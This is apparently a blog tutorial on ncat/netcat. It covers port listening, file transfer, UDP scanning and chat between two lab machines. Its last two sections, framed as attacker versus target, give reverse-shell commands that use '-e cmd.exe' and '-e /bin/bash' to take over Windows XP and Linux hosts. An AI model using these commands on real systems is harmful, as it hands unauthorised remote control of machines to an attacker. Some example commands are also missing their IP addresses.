Intro - Ncat or netcat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations. It is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses. Ncat is also known as : THE SWISS ARMY KNIFE. we can write ncat or nc while running the command options. So dont be confuse if i will use different name of ncat. simply we can understand What netcat does it opens the connection between two machines and give back two streams.

IN this tutorial we need two machine here I am using kali linux as server and backtrack as client machine.

1. How to open ncat
A. GUI Method
Application →Kali Linux → Information gathering → Live Host Identification → ncat
                                                                        (click on image for large view)

B. Open terminal type ncat –h this command will open ncat with help options

2.  Listening on any TCP/UDP port  - We will learn to act as any server with ncat. Let me clear you some command option which we are going to use here
-l option will help it work in listen mode.
-p option will mention which port to listen.
-v option will make it interactive.
On kali linux (server)
Syntax – ncat –lvvp port
       Ex – ncat –lvvp 25

On Backtrack (client )
Syntax – telnet serverIP port
Ex- telnet 25

Run this command on Kali linux (server). It will show you that you are established
Syntax – netstat –antp |grep port  (run this syntax in a new terminal)
Ex - netstat –antp |grep 25

These are proof we have successfully done our job

3. Transfer file by using ncat  - we will learn transferring file with ncat between server or client.
ncat –lvvp 3333 > receive.txt will make your pc to listen on tcp port 3333 and write everything from the client to the receive.txt file.
nc serverIp address 3333 < send.txt command on the client will establish session to server and starts uploading the send.txt to server. Lets learn this theory with some practical example but before this I want to explain commands once again in syntax mode.
Kali Linux (server)
Syntax - ncat –lvvp port > filename.txt
Ex – ncat –lvvp 3333 > receive.txt

Backtrack (client)
Syntax – echo “write whatever you want to send” > filename2.txt
                ncat serverIP port < filename2.txt
Ex – echo “hello I am a client PC and My name is backtrack” > send.txt
        Ncat 3333 < send.txt

Here you can see we have successful on our task.

4. Ncat as a simple UDP Port scanner.
Ex – nc -vzu 1-255

5. Create a instant chat session by ncat – we are going to create a chat session between sever or client.
Kali linux (server)
Syntax – nc –l –p port
Ex – nc –l –p 3333
   Here –l option will help it works in listener mode
            -p option for port number

Backtrack (client)
Syntax – nc serverIP port
Ex – nc 3333

If everything is fine we will get msg on both PC server or client which they are sending to each other as shown image:

6. Get access on windows Xp by ncat – I am going to show you how can you get access on a windows xp as target OS through Kali linux as Attacker OS. First of all download ncat for windows from here. Now follow th images for more info.
 Kali linux (Attacker )
  Syntax – nc –lvvp port
  Ex – nc –lvvp 3333

Here we have download ncat for windows

Windows Xp (Target)
  Syntax – nc.exe attackerIP port –e cmd.exe
  Ex – nc.exe 3333 –e cmd.exe

Now you can see we have entered on windows xp C drive

Just for  verification run command ipconfig there you will see the IP address of Windows Xp

7. Get access on Linux by ncat  – I am going to show you how can you get access on linux as target OS through windows XP as Attacker OS. First of all download ncat for windows from here. Now follow the images for more info.
Windows Xp (Attacker)
  Syntax – nc.exe –lvvp port
  Ex – nc.exe –lvvp 3333

Linux (Target)
  Syntax – nc AttackerIP –e /bin/bash
  Ex – nc 3333 –e /bin/bash

Now you can see we have entered on Linux

Just for Verification run command ifconfig here you will see the IP address of linux
(click on image for large view)

Like it ? Share it.

Post a Comment

Comment Rules :
1. Do not post Adult/illegal Links.
2. Try to comment in only English Language.
3. Do not post other website's links which are useless.
4. Your Comment should be based on the Topic for other queries Kindly Visit our Contact Us Page.
5. Do not use Abusive Language.
6. Respect each other.
Thank You for following the rules. Please Comment....